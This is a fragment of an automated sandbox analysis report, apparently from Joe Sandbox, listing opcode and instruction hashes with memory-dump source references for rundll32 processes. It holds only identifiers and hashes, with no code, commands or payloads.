                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e9c04b725a8d656964ffcdd9a4129c3f2b299aca6bce1e7cadf2b76a8a0b18e5
                                                                                                                                                                                                                                          • Instruction ID: 4974615b1da3dd27c10edec17b826431559c1d686649467ca1e03e99f4821e51
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9c04b725a8d656964ffcdd9a4129c3f2b299aca6bce1e7cadf2b76a8a0b18e5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F0A7217042E84AEB20166855403DA2F9B5F4631DF16007ACC81CBAB3D698ED45A3D1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 656779958da2c7ef1753dfef0578d2e9a69709c60e6ab3fdc3cba7bb172d4158
                                                                                                                                                                                                                                          • Instruction ID: 7def42f2ce210b1ea5ddb453d495b350104a5cfbe6d4913bd103ece9eb654fc9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 656779958da2c7ef1753dfef0578d2e9a69709c60e6ab3fdc3cba7bb172d4158
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61E02B767007041B8225E6ADE41085EBAC7EFC5161300463DD10DCF700DE24BC0643D9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8E02B353007085BC314B758E01595E7BDAFBC5775F40062DE54A87B40CE797D068BD6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c66f5309a160e5fae4b240531aff99187e3ff2d0c3d7f1c2a72db53374a2c27b
                                                                                                                                                                                                                                          • Instruction ID: 017921f0d16b02d038b7ebf36e20100e73790744300fbd9ed39d1840cbf534ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c66f5309a160e5fae4b240531aff99187e3ff2d0c3d7f1c2a72db53374a2c27b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3FD0A73E300168174648279EB41586EB7EFCBC5D72305032FEB09C3340CE595C0103D5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f25f0fae09d1c1849478200382dca82acc86d3f867e68056b84fcd246817f904
                                                                                                                                                                                                                                          • Instruction ID: bd6e5398308d6fdad3e8850e9d4e5e13fd91129e4e63ecf6c5eef6afe6fdc086
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f25f0fae09d1c1849478200382dca82acc86d3f867e68056b84fcd246817f904
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AAE0EC75304204DFD314DF5CD884C95BBEAEF592553558199E848CF322D722FD12CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 8e8fb22258e9bde119f738524ba987f0a42106c2c3d14d0112d4516384b4ce96
                                                                                                                                                                                                                                          • Instruction ID: ffe284f2f22efcaa7285b501fa8a55d25d442d44f6caa2b451b769ed945de936
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e8fb22258e9bde119f738524ba987f0a42106c2c3d14d0112d4516384b4ce96
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75E0B674E0430CAFCB54EFF8E44559DBBF5AB48301F0081AAE809E7350EA386A058F81
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c1e95258c9b11bf7539b00a4ab4eed87734eba5498cf9e58ff26ce2018688456
                                                                                                                                                                                                                                          • Instruction ID: ac3c3db3676b176afe8468d10c1d840e34e5840ab53c965d9ffa00d3115049d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1e95258c9b11bf7539b00a4ab4eed87734eba5498cf9e58ff26ce2018688456
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14D0A73331011C6F52186656DC46A6A7FAEE7942623548423F90583310DD607C0593DA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 097b3562471758e9951ed23513a64cba4d18920095e3c8236e01f50244006e5c
                                                                                                                                                                                                                                          • Instruction ID: d6c4b056f1ba1e4c88bd77e58a46aad728edea52d63f4d9291c5230a0563921d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 097b3562471758e9951ed23513a64cba4d18920095e3c8236e01f50244006e5c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5ED017352102005BE324E660E992B8A3B52EBC4201F558566E2095FAA5DE62BC4B8BD5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 853add3d29e72abc0eb5f94532ba89047d79ad9ff00b2cebf4ef6f2cb818a4f1
                                                                                                                                                                                                                                          • Instruction ID: af647ce50c78820de38df74c6429f34980147c3185f0cd66fbe270ab0607c8cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 853add3d29e72abc0eb5f94532ba89047d79ad9ff00b2cebf4ef6f2cb818a4f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8D0C274801308DFCB00CFB0EA4168DBFB8DB44200B1086A5D8049B210EE705E02CBC1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c80ad66089a879ff010969ebc3a329561bc6ab48cbb9e72d6d157e21e012bcb6
                                                                                                                                                                                                                                          • Instruction ID: 381bdca0ca96bcd90a1bc49f043c413c12703f9890975dfdd10c2743a9f478bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c80ad66089a879ff010969ebc3a329561bc6ab48cbb9e72d6d157e21e012bcb6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BED09723B4E7B0DBC31022A8250019D679B8FC9136F2640FBD808EF212D238CC004380
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 840a33c5eb6e2fff559c7eb2d10e33bf7ba5a4c874c2f00209af665fc8a26313
                                                                                                                                                                                                                                          • Instruction ID: 5b17fe8360b13e26b632cd5425c3671968e10bf34d387eae5d08ef047a02c428
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 840a33c5eb6e2fff559c7eb2d10e33bf7ba5a4c874c2f00209af665fc8a26313
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2D05E3032D2908FCB188BB8A0254A93BA6DB455453150AEED40AC7563EA59D4148B01
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$,q$,q$Hq$`]q$`]q
                                                                                                                                                                                                                                          • API String ID: 0-776724203
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $q$$q
                                                                                                                                                                                                                                          • API String ID: 0-3126353813
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 41a5fb7410335ae988f1b33c09f768a7409ef5567ba06d7540f24c2ee03a6262
                                                                                                                                                                                                                                          • Instruction ID: 729af9625d99fd25d78280a8fa5fe7062af707d83a0609e3c048e33df5674e01
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41a5fb7410335ae988f1b33c09f768a7409ef5567ba06d7540f24c2ee03a6262
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D631E73E7003097FDB189E65A55AB2A7FEBDBC1391B094067DA088F255DE34AC1187E0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d298ed202ff2cd210da34c5e1090004b162534004c986bbbb7113ac9bc8405f1
                                                                                                                                                                                                                                          • Instruction ID: 87ddde6ae364d70fe5465c0f6d4458ccc85e6129b5db83fcac0177f55b54109b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d298ed202ff2cd210da34c5e1090004b162534004c986bbbb7113ac9bc8405f1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A11DA7AF00214BBFF149E6585457BE77EBDBC8251F084036D606D7284EE75DE068750
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f7637ede4f100f0dc47b3f6695374222b2e29d492393617b2616f4f191b3d20f
                                                                                                                                                                                                                                          • Instruction ID: 10545fe71545fa5b4c6964772dd13128ba0d25b357c832a6e9a6cb191e429787
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f7637ede4f100f0dc47b3f6695374222b2e29d492393617b2616f4f191b3d20f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD11E035B002246F9F94FBB950242AE7AE79FC821570008B9D40ADB344EF349E029BD6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2535624c6a2b2362f48b04fa578f67a3e2d856fd74548e4d644fb6f7f1253864
                                                                                                                                                                                                                                          • Instruction ID: 8c6c310eca22b4fb6d9369bc427df014378529848d48538368921b69ffee410b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2535624c6a2b2362f48b04fa578f67a3e2d856fd74548e4d644fb6f7f1253864
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6721EA75E102189FCB44DF69D48499EBBF6FF4C310B108169E915EB365DB319942CF90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2190683370ee75e5767150251534838c2d5be34a93a07b6d8096450db54d4f3a
                                                                                                                                                                                                                                          • Instruction ID: 781c75a5e804050f37fa985341a9ee6689db3806f2b2a1a5fa3f13f965dd9c97
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2190683370ee75e5767150251534838c2d5be34a93a07b6d8096450db54d4f3a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB211570D002099FDB20DFAAC885BDEFBF5FB48324F508129D559A7240CB756906CFA5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9738400adac08b9777647a14dfaf3de0de6da0855155099b8de22af5ebe82ba6
                                                                                                                                                                                                                                          • Instruction ID: 709edbec9261c25b056180620dd45642b5035cba3b95cdbf33298afda23906bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9738400adac08b9777647a14dfaf3de0de6da0855155099b8de22af5ebe82ba6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0116A3DA00115AFDB18DFA4D555BA97BB2EFCC320F154029DA0AA7240CE389C4ACB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ed843301461cb8461e35788ad3ff176a339f944859e0237d4fa28612fe2a3715
                                                                                                                                                                                                                                          • Instruction ID: f9b571392043250f201f30fc21bfb5724a828fef7e7828d1fd7545abfc3d1105
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed843301461cb8461e35788ad3ff176a339f944859e0237d4fa28612fe2a3715
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E1124B0D002099FDB20DFAAC481B9EFBF5FF48314F508129D85967240CB756905CFA5
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d3bd9d397e641090e9530e625894e677a9fdb8e3e15301ca005e10b00ff21ddf
                                                                                                                                                                                                                                          • Instruction ID: 1941a12407a477a329fe8ead6b6cc163628506f8a63bf4fb174387e19b980d43
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3bd9d397e641090e9530e625894e677a9fdb8e3e15301ca005e10b00ff21ddf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF11003DA00215AFDB14DF94D559BA97BB6EFCC321F144029EA09A7340CF795C45CB90
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e0187b7b11934c32cd4fffeec7a699877e368d1ca897ff74ca33dc381f08e332
                                                                                                                                                                                                                                          • Instruction ID: 3effdd3056ff12449ae446eace1a420a40ec52632872827b44c10a07b300e7ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0187b7b11934c32cd4fffeec7a699877e368d1ca897ff74ca33dc381f08e332
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4301B575B00214AF8B94FFB9901866E7BE7AFC8615B0108B9D44ADB344EF359D029BD2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
Memory Dump Source
• Source File: 00000007.00000002.1375911616.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_316d000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f690795f6eef2f97e8bce5e3890812a5c6b7a31bfcfc2d5481cd72ac9253127e
                                                                                                                                                                                                                                          • Instruction ID: cf81e76a38fcdbc1849070ddb094e783b0808da4bd838e8a0834c844a73d1e5e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f690795f6eef2f97e8bce5e3890812a5c6b7a31bfcfc2d5481cd72ac9253127e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301407110D3C09FD7128B259C95B52BFB8DF47224F1D81DBD8888F2A3C2699844CB72
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000002.1375911616.000000000316D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0316D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_316d000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d6a8c3d342fc985c6430e4f862d52941e9eebf020424e9ba7712753099add7ed
                                                                                                                                                                                                                                          • Instruction ID: 9bbb834e53e8e1ca943fa9568302966f21e2c28281380639785426ba16ded482
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6a8c3d342fc985c6430e4f862d52941e9eebf020424e9ba7712753099add7ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F101F7306087449FE7208A61EC84B67FF9CDF49225F18C15AEC480F282C3789845CAB1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000007.00000003.1374035846.0000000004C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C90000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_7_3_4c90000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d507b3b4081015e82acd12abbf821ea733552f7646fd0c1326030a0aab883755
                                                                                                                                                                                                                                          • Instruction ID: 6e2f9cf7332d12004283b93e5e626531daa15130024906ae0170cbc976427c77
